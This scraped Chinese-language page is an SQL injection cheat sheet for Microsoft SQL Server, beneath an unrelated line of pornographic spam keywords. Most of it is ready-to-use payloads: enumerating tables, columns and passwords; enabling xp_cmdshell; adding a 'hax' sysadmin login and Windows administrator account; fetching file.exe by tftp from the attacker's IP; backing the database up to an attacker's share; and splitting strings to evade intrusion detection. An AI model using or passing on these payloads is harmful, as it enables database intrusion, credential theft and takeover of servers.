国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

Sql注射終點Sql注射終點Sql Injection永遠是那么可愛...Sql注射總結（早源于‘or‘1‘=‘1）最重要的表名：select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用戶名（默認sql數(shù)據(jù)庫中存在著的）publicdboguest(一般禁止，或者沒權限)db_sercurityadminab_dlladmin---------------------------------union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=‘logintable‘—union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=‘logintable‘ where COLUMN_NAME NOT IN (‘login_id‘)—union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=‘logintable‘ where COLUMN_NAME NOT IN (‘login_id‘,‘login_name‘)—union select TOP 1 login_name FROM logintable—union select TOP 1 password FROM logintable where login_name=‘Rahul‘--構造語句：查詢是否存在xp_cmdshelland 1=(select @@VERSION)and ‘sa‘=(select System_user)and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ‘X‘ AND name = ‘xp_cmdshell‘);EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell‘, ‘xplog70.dll‘1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=‘x‘%20and%20name=‘xp_cmdshell‘)and 1=(select IS_SRVROLEMEMBER(‘sysadmin‘)) 判斷sa權限是否and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到庫名（從1到5都是系統(tǒng)的id，6以上才可以判斷）and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)依次提交 dbid = 7,8,9.... 得到更多的數(shù)據(jù)庫名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=‘U‘) 暴到一個表 假設為 adminand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=‘U‘ and name not in (‘Admin‘)) 來得到其他的表。and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=‘U‘ and name=‘admin‘and uid>(str(id))) 暴到UID的數(shù)值假設為18779569 uid=idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個字段,假設為 user_idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in(‘id‘,...)) 來暴出其他的字段and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名依次可以得到密碼。。。。。假設存在user_id username ,password 等字段and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=‘U‘) 得到表名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=‘U‘ and name not in(‘Address‘))and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=‘U‘ and name=‘admin‘ and uid>(str(id))) 判斷id值and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段傳統(tǒng)的存在xp_cmdshell的測試過程：;exec master.dbo.sp_addlogin hax;--;exec master.dbo.sp_password null,hax,hax;--;exec master.dbo.sp_addsrvrolemember hax sysadmin;--;exec master.dbo.xp_cmdshell ‘net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add‘;--;exec master.dbo.xp_cmdshell ‘net localgroup administrators hax /add‘;--exec master..xp_servicecontrol ‘start‘, ‘schedule‘exec master..xp_servicecontrol ‘start‘, ‘server‘http://localhost/show.asp?id=1; exec master.dbo.xp_cmdshell ‘tftp –i youip get file.exe‘;--http://localhost/show.asp?id=1‘; exec master..xp_cmdshell ‘tftp –i youip get file.exe‘—declare @a sysname set @a=‘xp_‘+‘cmdshell‘ exec @a ‘dir c:\‘declare @a sysname set @a=‘xp‘+‘_cm‘+‘dshell‘ exec @a ‘dir c:\‘;declare @a;set @a=db_name();backup database @a to disk=‘你的IP你的共享目錄bak.dat‘如果被限制則可以。select * from openrowset(‘sqloledb‘,‘server‘;‘sa‘;‘‘,‘select ‘‘OK!‘‘ exec master.dbo.sp_addlogin hax‘)傳統(tǒng)查詢構造：select * FROM news where id=... AND topic=... AND .....admin‘and 1=(select count(*) from [user] where username=‘victim‘ and right(left(userpass,01),1)=‘1‘) and userpass <>‘select 123;--;use master;--:a‘ or name like ‘fff%‘;-- 顯示有一個叫ffff的用戶哈。‘and 1<>(select count(email) from [user]);--;update [users] set email=(select top 1 name from sysobjects where xtype=‘u‘ and status>0) where name=‘ffff‘;--說明:上面的語句是得到數(shù)據(jù)庫中的第一個用戶表,并把表名放在ffff用戶的郵箱字段中。通過查看ffff的用戶資料可得第一個用表叫ad然后根據(jù)表名ad得到這個表的IDffff‘;update [users] set email=(select top 1 id from sysobjects where xtype=‘u‘ and name=‘ad‘) where name=‘ffff‘;--象下面這樣就可以得到第二個表的名字了ffff‘;update [users] set email=(select top 1 name from sysobjects where xtype=‘u‘ and id>581577110) where name=‘ffff‘;--ffff‘;update [users] set email=(select top 1 count(id) from password) where name=‘ffff‘;--ffff‘;update [users] set email=(select top 1 pwd from password where id=2) where name=‘ffff‘;--ffff‘;update [users] set email=(select top 1 name from password where id=2) where name=‘ffff‘;--exec master..xp_servicecontrol ‘start‘, ‘schedule‘exec master..xp_servicecontrol ‘start‘, ‘server‘sp_addextendedproc ‘xp_webserver‘, ‘c:\temp\xp_foo.dll‘擴展存儲就可以通過一般的方法調用：exec xp_webserver一旦這個擴展存儲執(zhí)行過，可以這樣刪除它:sp_dropextendedproc ‘xp_webserver‘insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)—insert into users values( 667,123,123,0xffff)—insert into users values ( 123, ‘admin‘‘--‘, ‘password‘, 0xffff)—;and user>0;;and (select count(*) from sysobjects)>0;;and (select count(*) from mysysobjects)>0 //為access數(shù)據(jù)庫-----------------------------------------------------------通常注射的一些介紹：A) ID=49 這類注入的參數(shù)是數(shù)字型，SQL語句原貌大致如下：select * from 表名 where 字段=49注入的參數(shù)為ID=49 And [查詢條件]，即是生成語句：select * from 表名 where 字段=49 And [查詢條件](B) Class=連續(xù)劇 這類注入的參數(shù)是字符型，SQL語句原貌大致概如下：select * from 表名 where 字段=‘連續(xù)劇‘注入的參數(shù)為Class=連續(xù)劇‘ and [查詢條件] and ‘‘=‘ ，即是生成語句：select * from 表名 where 字段=‘連續(xù)劇‘ and [查詢條件] and ‘‘=‘‘(C) 搜索時沒過濾參數(shù)的，如keyword=關鍵字，SQL語句原貌大致如下：select * from 表名 where 字段like ‘%關鍵字%‘注入的參數(shù)為keyword=‘ and [查詢條件] and ‘%25‘=‘， 即是生成語句：select * from 表名 where字段like ‘%‘ and [查詢條件] and ‘%‘=‘%‘;;and (select Top 1 name from sysobjects where xtype=‘U‘ and status>0)>0sysobjects是SQLServer的系統(tǒng)表，存儲著所有的表名、視圖、約束及其它對象，xtype=‘U‘ and status>0，表示用戶建立的表名，上面的語句將第一個表名取出，與0比較大小，讓報錯信息把表名暴露出來。;;and (select Top 1 col_name(object_id(‘表名‘),1) from sysobjects)>0從⑤拿到表名后，用object_id(‘表名‘)獲取表名對應的內部ID，col_name(表名ID,1)代表該表的第1個字段名，將1換成2,3,4...就可以逐個獲取所猜解表里面的字段名。post.htm內容：主要是方便輸入。<iframe name=p src=# width=800 height=350 frameborder=0></iframe><br><form action=http://test.com/count.asp target=p><input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=‘u‘ and status>0);--" style="width:750"><input type=submit value=">>>"><input type=hidden name=fno value="2, 3"></form>枚舉出他的數(shù)據(jù)表名：id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=‘u‘ and status>0);--這是將第一個表名更新到aaa的字段處。讀出第一個表，第二個表可以這樣讀出來（在條件后加上 and name<>‘剛才得到的表名‘）。id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=‘u‘ and status>0 and name<>‘vote‘);--然后id=1552 and exists(select * from aaa where aaa>5)讀出第二個表，^^^^^^一個個的讀出，直到沒有為止。讀字段是這樣：id=1552;update aaa set aaa=(select top 1 col_name(object_id(‘表名‘),1));--然后id=1552 and exists(select * from aaa where aaa>5)出錯，得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id(‘表名‘),2));--然后id=1552 and exists(select * from aaa where aaa>5)出錯，得到字段名--------------------------------高級技巧：[獲得數(shù)據(jù)表名][將字段值更新為表名，再想法讀出這個字段的值就可得到表名]update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>‘你得到的表名‘ 查出一個加一個]) [ where 條件]select top 1 name from sysobjects where xtype=u and status>0 and name not in(‘table1‘,‘table2‘,…)通過SQLSERVER注入漏洞建數(shù)據(jù)庫管理員賬號和系統(tǒng)管理員賬號[當前賬號必須是SYSADMIN組][獲得數(shù)據(jù)表字段名][將字段值更新為字段名，再想法讀出這個字段的值就可得到字段名]update 表名 set 字段=(select top 1 col_name(object_id(‘要查詢的數(shù)據(jù)表名‘),字段列如:1) [ where 條件]繞過IDS的檢測[使用變量]declare @a sysname set @a=‘xp_‘+‘cmdshell‘ exec @a ‘dir c:\‘declare @a sysname set @a=‘xp‘+‘_cm‘+‘dshell‘ exec @a ‘dir c:\‘